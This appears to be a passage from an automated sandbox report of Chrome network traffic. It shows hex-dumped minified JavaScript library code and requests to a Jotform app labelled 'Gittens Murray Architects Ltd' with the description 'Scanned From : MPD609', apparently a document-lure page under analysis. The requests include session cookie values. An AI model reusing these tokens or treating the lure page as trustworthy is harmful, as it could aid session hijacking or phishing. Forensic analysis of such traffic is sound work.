                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC1369INData Raw: 3e 39 3c 3c 34 29 5d 3d 74 3b 76 61 72 20 70 3d 31 37 33 32 35 38 34 31 39 33 2c 64 3d 2d 32 37 31 37 33 33 38 37 39 2c 66 3d 2d 31 37 33 32 35 38 34 31 39 34 2c 6d 3d 32 37 31 37 33 33 38 37 38 3b 66 6f 72 28 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 3d 31 36 29 63 3d 70 2c 6c 3d 64 2c 75 3d 66 2c 68 3d 6d 2c 70 3d 69 28 70 2c 64 2c 66 2c 6d 2c 65 5b 6e 5d 2c 37 2c 2d 36 38 30 38 37 36 39 33 36 29 2c 6d 3d 69 28 6d 2c 70 2c 64 2c 66 2c 65 5b 6e 2b 31 5d 2c 31 32 2c 2d 33 38 39 35 36 34 35 38 36 29 2c 66 3d 69 28 66 2c 6d 2c 70 2c 64 2c 65 5b 6e 2b 32 5d 2c 31 37 2c 36 30 36 31 30 35 38 31 39 29 2c 64 3d 69 28 64 2c 66 2c 6d 2c 70 2c 65 5b 6e 2b 33 5d 2c 32 32 2c 2d 31 30 34 34 35 32 35 33 33 30 29 2c 70 3d 69 28 70 2c 64 2c 66 2c 6d 2c 65 5b 6e
                                                                                                                                                                                                                                            Data Ascii: >9<<4)]=t;var p=1732584193,d=-271733879,f=-1732584194,m=271733878;for(n=0;n<e.length;n+=16)c=p,l=d,u=f,h=m,p=i(p,d,f,m,e[n],7,-680876936),m=i(m,p,d,f,e[n+1],12,-389564586),f=i(f,m,p,d,e[n+2],17,606105819),d=i(d,f,m,p,e[n+3],22,-1044525330),p=i(p,d,f,m,e[n
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC1369INData Raw: 5d 2c 31 31 2c 31 32 37 32 38 39 33 33 35 33 29 2c 66 3d 6f 28 66 2c 6d 2c 70 2c 64 2c 65 5b 6e 2b 37 5d 2c 31 36 2c 2d 31 35 35 34 39 37 36 33 32 29 2c 64 3d 6f 28 64 2c 66 2c 6d 2c 70 2c 65 5b 6e 2b 31 30 5d 2c 32 33 2c 2d 31 30 39 34 37 33 30 36 34 30 29 2c 70 3d 6f 28 70 2c 64 2c 66 2c 6d 2c 65 5b 6e 2b 31 33 5d 2c 34 2c 36 38 31 32 37 39 31 37 34 29 2c 6d 3d 6f 28 6d 2c 70 2c 64 2c 66 2c 65 5b 6e 5d 2c 31 31 2c 2d 33 35 38 35 33 37 32 32 32 29 2c 66 3d 6f 28 66 2c 6d 2c 70 2c 64 2c 65 5b 6e 2b 33 5d 2c 31 36 2c 2d 37 32 32 35 32 31 39 37 39 29 2c 64 3d 6f 28 64 2c 66 2c 6d 2c 70 2c 65 5b 6e 2b 36 5d 2c 32 33 2c 37 36 30 32 39 31 38 39 29 2c 70 3d 6f 28 70 2c 64 2c 66 2c 6d 2c 65 5b 6e 2b 39 5d 2c 34 2c 2d 36 34 30 33 36 34 34 38 37 29 2c 6d 3d 6f 28
                                                                                                                                                                                                                                            Data Ascii: ],11,1272893353),f=o(f,m,p,d,e[n+7],16,-155497632),d=o(d,f,m,p,e[n+10],23,-1094730640),p=o(p,d,f,m,e[n+13],4,681279174),m=o(m,p,d,f,e[n],11,-358537222),f=o(f,m,p,d,e[n+3],16,-722521979),d=o(d,f,m,p,e[n+6],23,76029189),p=o(p,d,f,m,e[n+9],4,-640364487),m=o(
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC1369INData Raw: 7b 72 65 74 75 72 6e 20 75 6e 65 73 63 61 70 65 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 64 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6c 28 63 28 75 28 65 29 2c 38 2a 65 2e 6c 65 6e 67 74 68 29 29 7d 28 70 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 2c 6e 2c 69 3d 75 28 65 29 2c 73 3d 5b 5d 2c 6f 3d 5b 5d 3b 66 6f 72 28 73 5b 31 35 5d 3d 6f 5b 31 35 5d 3d 76 6f 69 64 20 30 2c 69 2e 6c 65 6e 67 74 68 3e 31 36 26 26 28 69 3d 63 28 69 2c 38 2a 65 2e 6c 65 6e 67 74 68 29 29 2c 72 3d 30 3b 72 3c 31 36 3b 72 2b 3d 31 29 73 5b 72 5d 3d 39 30 39 35 32 32 34 38 36
                                                                                                                                                                                                                                            Data Ascii: {return unescape(encodeURIComponent(e))}function d(e){return function(e){return l(c(u(e),8*e.length))}(p(e))}function f(e,t){return function(e,t){var r,n,i=u(e),s=[],o=[];for(s[15]=o[15]=void 0,i.length>16&&(i=c(i,8*e.length)),r=0;r<16;r+=1)s[r]=909522486
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC1369INData Raw: 65 5b 74 5d 2c 72 29 7d 29 29 2c 73 28 74 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 73 29 7b 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 6f 28 65 2c 74 29 26 26 21 28 4f 62 6a 65 63 74 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 65 2c 74 29 26 26 4f 62 6a 65 63 74 2e 70 72 6f 70 65 72 74 79 49 73 45 6e 75 6d 65 72 61 62 6c 65 2e 63 61 6c 6c 28 65 2c 74 29 29 7d 29 28 65 2c 73 29 7c 7c 28 6f 28 65 2c 73 29 26 26 72 2e 69 73 4d 65 72 67 65 61 62 6c 65 4f 62 6a 65 63 74 28 74 5b 73 5d 29 3f 69 5b 73 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 21 74 2e 63 75 73 74 6f 6d 4d 65 72 67 65 29 72 65 74 75 72 6e 20 63 3b 76 61 72 20 72 3d 74 2e 63 75 73 74 6f 6d 4d 65 72 67 65 28 65 29 3b 72 65
                                                                                                                                                                                                                                            Data Ascii: e[t],r)})),s(t).forEach((function(s){(function(e,t){return o(e,t)&&!(Object.hasOwnProperty.call(e,t)&&Object.propertyIsEnumerable.call(e,t))})(e,s)||(o(e,s)&&r.isMergeableObject(t[s])?i[s]=function(e,t){if(!t.customMerge)return c;var r=t.customMerge(e);re
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC1369INData Raw: 69 65 6e 74 22 2c 22 74 65 78 74 50 61 74 68 22 5d 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 5b 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 65 5d 7d 29 29 29 2c 74 2e 61 74 74 72 69 62 75 74 65 4e 61 6d 65 73 3d 6e 65 77 20 4d 61 70 28 5b 22 64 65 66 69 6e 69 74 69 6f 6e 55 52 4c 22 2c 22 61 74 74 72 69 62 75 74 65 4e 61 6d 65 22 2c 22 61 74 74 72 69 62 75 74 65 54 79 70 65 22 2c 22 62 61 73 65 46 72 65 71 75 65 6e 63 79 22 2c 22 62 61 73 65 50 72 6f 66 69 6c 65 22 2c 22 63 61 6c 63 4d 6f 64 65 22 2c 22 63 6c 69 70 50 61 74 68 55 6e 69 74 73 22 2c 22 64 69 66 66 75 73 65 43 6f 6e 73 74 61 6e 74 22 2c 22 65 64 67 65 4d 6f 64 65 22 2c 22 66 69 6c 74 65 72 55 6e 69 74 73 22 2c 22 67 6c 79 70 68 52 65 66 22 2c 22 67 72 61 64
                                                                                                                                                                                                                                            Data Ascii: ient","textPath"].map((function(e){return[e.toLowerCase(),e]}))),t.attributeNames=new Map(["definitionURL","attributeName","attributeType","baseFrequency","baseProfile","calcMode","clipPathUnits","diffuseConstant","edgeMode","filterUnits","glyphRef","grad
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC1369INData Raw: 69 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 74 2c 72 29 3b 69 26 26 21 28 22 67 65 74 22 69 6e 20 69 3f 21 74 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3a 69 2e 77 72 69 74 61 62 6c 65 7c 7c 69 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 29 7c 7c 28 69 3d 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 5b 72 5d 7d 7d 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 6e 2c 69 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 2c 6e 29 7b 76 6f 69 64 20 30 3d 3d 3d 6e 26 26 28 6e 3d 72 29 2c 65 5b 6e 5d 3d 74 5b 72 5d 7d 29 2c 73 3d 74 68 69 73 26 26 74 68 69 73 2e 5f 5f 73 65 74 4d 6f 64 75 6c 65 44 65 66 61 75 6c 74 7c
                                                                                                                                                                                                                                            Data Ascii: i=Object.getOwnPropertyDescriptor(t,r);i&&!("get"in i?!t.__esModule:i.writable||i.configurable)||(i={enumerable:!0,get:function(){return t[r]}}),Object.defineProperty(e,n,i)}:function(e,t,r,n){void 0===n&&(n=r),e[n]=t[r]}),s=this&&this.__setModuleDefault|
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC1369INData Raw: 20 61 2e 53 63 72 69 70 74 3a 63 61 73 65 20 61 2e 53 74 79 6c 65 3a 63 61 73 65 20 61 2e 54 61 67 3a 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3b 22 66 6f 72 65 69 67 6e 22 3d 3d 3d 74 2e 78 6d 6c 4d 6f 64 65 26 26 28 65 2e 6e 61 6d 65 3d 6e 75 6c 6c 21 3d 3d 28 72 3d 6c 2e 65 6c 65 6d 65 6e 74 4e 61 6d 65 73 2e 67 65 74 28 65 2e 6e 61 6d 65 29 29 26 26 76 6f 69 64 20 30 21 3d 3d 72 3f 72 3a 65 2e 6e 61 6d 65 2c 65 2e 70 61 72 65 6e 74 26 26 6d 2e 68 61 73 28 65 2e 70 61 72 65 6e 74 2e 6e 61 6d 65 29 26 26 28 74 3d 6e 28 6e 28 7b 7d 2c 74 29 2c 7b 78 6d 6c 4d 6f 64 65 3a 21 31 7d 29 29 29 3b 21 74 2e 78 6d 6c 4d 6f 64 65 26 26 67 2e 68 61 73 28 65 2e 6e 61 6d 65 29 26 26 28 74 3d 6e 28 6e 28 7b 7d 2c 74 29 2c 7b 78 6d
                                                                                                                                                                                                                                            Data Ascii: a.Script:case a.Style:case a.Tag:return function(e,t){var r;"foreign"===t.xmlMode&&(e.name=null!==(r=l.elementNames.get(e.name))&&void 0!==r?r:e.name,e.parent&&m.has(e.parent.name)&&(t=n(n({},t),{xmlMode:!1})));!t.xmlMode&&g.has(e.name)&&(t=n(n({},t),{xm
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC1369INData Raw: 29 2c 67 3d 6e 65 77 20 53 65 74 28 5b 22 73 76 67 22 2c 22 6d 61 74 68 22 5d 29 7d 2c 31 31 38 35 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 44 6f 63 74 79 70 65 3d 74 2e 43 44 41 54 41 3d 74 2e 54 61 67 3d 74 2e 53 74 79 6c 65 3d 74 2e 53 63 72 69 70 74 3d 74 2e 43 6f 6d 6d 65 6e 74 3d 74 2e 44 69 72 65 63 74 69 76 65 3d 74 2e 54 65 78 74 3d 74 2e 52 6f 6f 74 3d 74 2e 69 73 54 61 67 3d 74 2e 45 6c 65 6d 65 6e 74 54 79 70 65 3d 76 6f 69 64 20 30 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 52 6f 6f 74 3d 22 72 6f 6f 74 22 2c 65 2e 54 65 78 74
                                                                                                                                                                                                                                            Data Ascii: ),g=new Set(["svg","math"])},11852:function(e,t){"use strict";var r;Object.defineProperty(t,"__esModule",{value:!0}),t.Doctype=t.CDATA=t.Tag=t.Style=t.Script=t.Comment=t.Directive=t.Text=t.Root=t.isTag=t.ElementType=void 0,function(e){e.Root="root",e.Text
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC1369INData Raw: 69 73 2e 64 6f 6d 29 2c 74 68 69 73 2e 64 6f 6e 65 3d 21 31 2c 74 68 69 73 2e 74 61 67 53 74 61 63 6b 3d 5b 74 68 69 73 2e 72 6f 6f 74 5d 2c 74 68 69 73 2e 6c 61 73 74 4e 6f 64 65 3d 6e 75 6c 6c 2c 74 68 69 73 2e 70 61 72 73 65 72 3d 6e 75 6c 6c 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 72 3d 74 2c 74 3d 61 29 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 28 74 3d 65 2c 65 3d 76 6f 69 64 20 30 29 2c 74 68 69 73 2e 63 61 6c 6c 62 61 63 6b 3d 6e 75 6c 6c 21 3d 65 3f 65 3a 6e 75 6c 6c 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 3d 6e 75 6c 6c 21 3d 74 3f 74 3a 61 2c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 43 42 3d 6e 75 6c 6c 21 3d 72 3f 72 3a 6e 75 6c 6c 7d 72 65 74 75 72 6e 20 65 2e 70 72 6f 74 6f 74 79 70 65 2e 6f 6e
                                                                                                                                                                                                                                            Data Ascii: is.dom),this.done=!1,this.tagStack=[this.root],this.lastNode=null,this.parser=null,"function"==typeof t&&(r=t,t=a),"object"==typeof e&&(t=e,e=void 0),this.callback=null!=e?e:null,this.options=null!=t?t:a,this.elementCB=null!=r?r:null}return e.prototype.on


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            84192.168.2.1749798104.19.128.1054435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC860OUTGET /uploads/Gittens_Murray/form_files/250092704521347_mainPWAIcon.678100e1e431c.png?width=32&height=32&time=1736507717 HTTP/1.1
                                                                                                                                                                                                                                            Host: eu.jotform.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/app/250092704521347
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC1257INHTTP/1.1 302 Found
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:19 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:05:22 GMT
                                                                                                                                                                                                                                            jf-trace-id: 301b3bcfdacef3bf
                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000;
                                                                                                                                                                                                                                            content-security-policy-report-only: default-src https: data: blob: wss: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' *.jotfor.ms https://js.jotform.com/actions.js https://www.googletagmanager.com https://consent.cookiebot.com https://consentcdn.cookiebot.com https://static.olark.com https://knrpc.olark.com/nrpc/ https://js-agent.newrelic.com https://browser.sentry-cdn.com https://js.sentry-cdn.com https://edge.fullstory.com https://rs.fullstory.com; report-uri /opt/csp-violation-report.php
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:36:19 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=3600
                                                                                                                                                                                                                                            pragma: no-cache
                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                            location: https://eu-files.jotform.com/jufs/Gittens_Murray/form_files/250092704521347_mainPWAIcon.678100e1e431c.png?md5=e4TDInN6eX2nSpbcjpEIcw&expires=1736510732&width=32&height=32
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Age: 1857
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb646db554385-EWR


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            85192.168.2.1749799104.19.128.1054435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC768OUTGET /app/250092704521347/manifest.json HTTP/1.1
                                                                                                                                                                                                                                            Host: eu.jotform.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: manifest
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/app/250092704521347
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
                                                                                                                                                                                                                                            If-Modified-Since: Fri, 10 Jan 2025 12:36:17 GMT
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC1264INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:19 GMT
                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                                                            p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:36:19 GMT
                                                                                                                                                                                                                                            jf-trace-id: 5aa9f0b92c6031c4
                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000;
                                                                                                                                                                                                                                            content-security-policy-report-only: default-src https: data: blob: wss: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' *.jotfor.ms https://js.jotform.com/actions.js https://www.googletagmanager.com https://consent.cookiebot.com https://consentcdn.cookiebot.com https://static.olark.com https://knrpc.olark.com/nrpc/ https://js-agent.newrelic.com https://browser.sentry-cdn.com https://js.sentry-cdn.com https://edge.fullstory.com https://rs.fullstory.com; report-uri /opt/csp-violation-report.php
                                                                                                                                                                                                                                            expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            pragma: no-cache
                                                                                                                                                                                                                                            Set-Cookie: guest=guest_5a3c5173c0bb4f63; expires=Mon, 10 Feb 2025 12:36:19 GMT; Max-Age=2678400; path=/; domain=.jotform.com; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                            global-router: true
                                                                                                                                                                                                                                            x-raw-uri: /app/:appID/manifest.json
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb6470c3f727d-EWR
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC105INData Raw: 37 36 62 0d 0a 7b 22 6e 61 6d 65 22 3a 22 47 69 74 74 65 6e 73 20 4d 75 72 72 61 79 20 41 72 63 68 69 74 65 63 74 73 20 4c 74 64 22 2c 22 73 68 6f 72 74 5f 6e 61 6d 65 22 3a 22 47 69 74 74 65 6e 73 20 4d 75 72 72 61 79 20 41 72 63 68 69 74 65 63 74 73 20 4c 74 64 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22
                                                                                                                                                                                                                                            Data Ascii: 76b{"name":"Gittens Murray Architects Ltd","short_name":"Gittens Murray Architects Ltd","description":"
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC1369INData Raw: 53 63 61 6e 6e 65 64 20 46 72 6f 6d 20 3a 20 4d 50 44 36 30 39 5c 6e 22 2c 22 73 63 6f 70 65 22 3a 22 5c 2f 61 70 70 5c 2f 32 35 30 30 39 32 37 30 34 35 32 31 33 34 37 22 2c 22 73 74 61 72 74 5f 75 72 6c 22 3a 22 5c 2f 61 70 70 5c 2f 32 35 30 30 39 32 37 30 34 35 32 31 33 34 37 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 6a 6f 74 66 6f 72 6d 5f 70 77 61 22 2c 22 64 69 73 70 6c 61 79 22 3a 22 73 74 61 6e 64 61 6c 6f 6e 65 22 2c 22 74 68 65 6d 65 5f 63 6f 6c 6f 72 22 3a 22 23 66 66 66 66 66 66 22 2c 22 62 61 63 6b 67 72 6f 75 6e 64 5f 63 6f 6c 6f 72 22 3a 22 23 30 41 31 35 35 31 22 2c 22 69 63 6f 6e 73 22 3a 5b 7b 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 65 75 2e 6a 6f 74 66 6f 72 6d 2e 63 6f 6d 5c 2f 75 70 6c 6f 61 64 73 5c 2f 47 69 74 74 65 6e 73 5f 4d
                                                                                                                                                                                                                                            Data Ascii: Scanned From : MPD609\n","scope":"\/app\/250092704521347","start_url":"\/app\/250092704521347?utm_source=jotform_pwa","display":"standalone","theme_color":"#ffffff","background_color":"#0A1551","icons":[{"src":"https:\/\/eu.jotform.com\/uploads\/Gittens_M
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC432INData Raw: 5c 2f 5c 2f 65 75 2e 6a 6f 74 66 6f 72 6d 2e 63 6f 6d 5c 2f 75 70 6c 6f 61 64 73 5c 2f 47 69 74 74 65 6e 73 5f 4d 75 72 72 61 79 5c 2f 66 6f 72 6d 5f 66 69 6c 65 73 5c 2f 32 35 30 30 39 32 37 30 34 35 32 31 33 34 37 5f 6d 61 69 6e 50 57 41 49 63 6f 6e 2e 36 37 38 31 30 30 65 31 65 34 33 31 63 2e 70 6e 67 3f 77 69 64 74 68 3d 35 31 32 26 68 65 69 67 68 74 3d 35 31 32 26 74 69 6d 65 3d 31 37 33 36 35 30 37 37 31 37 22 2c 22 73 69 7a 65 73 22 3a 22 35 31 32 78 35 31 32 22 2c 22 74 79 70 65 22 3a 22 69 6d 61 67 65 5c 2f 70 6e 67 22 7d 5d 2c 22 73 68 6f 72 74 63 75 74 73 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 50 61 67 65 22 2c 22 75 72 6c 22 3a 22 5c 2f 61 70 70 5c 2f 32 35 30 30 39 32 37 30 34 35 32 31 33 34 37 5c 2f 70 61 67 65 5c 2f 30 3f 75 74 6d 5f 73 6f 75
                                                                                                                                                                                                                                            Data Ascii: \/\/eu.jotform.com\/uploads\/Gittens_Murray\/form_files\/250092704521347_mainPWAIcon.678100e1e431c.png?width=512&height=512&time=1736507717","sizes":"512x512","type":"image\/png"}],"shortcuts":[{"name":"Page","url":"\/app\/250092704521347\/page\/0?utm_sou
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            86192.168.2.1749801104.19.128.1054435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC825OUTGET /uploads/Gittens_Murray/form_files/250092704521347_mainPWAIcon.678100e1e431c.png HTTP/1.1
                                                                                                                                                                                                                                            Host: eu.jotform.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/app/250092704521347
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
                                                                                                                                                                                                                                            2025-01-10 12:36:19 UTC1238INHTTP/1.1 302 Found
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:19 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:05:16 GMT
                                                                                                                                                                                                                                            jf-trace-id: a7959f77b1e13106
                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000;
                                                                                                                                                                                                                                            content-security-policy-report-only: default-src https: data: blob: wss: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' *.jotfor.ms https://js.jotform.com/actions.js https://www.googletagmanager.com https://consent.cookiebot.com https://consentcdn.cookiebot.com https://static.olark.com https://knrpc.olark.com/nrpc/ https://js-agent.newrelic.com https://browser.sentry-cdn.com https://js.sentry-cdn.com https://edge.fullstory.com https://rs.fullstory.com; report-uri /opt/csp-violation-report.php
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:36:19 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=3600
                                                                                                                                                                                                                                            pragma: no-cache
                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                            location: https://eu-files.jotform.com/jufs/Gittens_Murray/form_files/250092704521347_mainPWAIcon.678100e1e431c.png?md5=ryw-nPNnemSleOEGRmSPqA&expires=1736510726
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Age: 1863
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb6470ed94392-EWR


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            87192.168.2.1749800104.19.129.1054435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
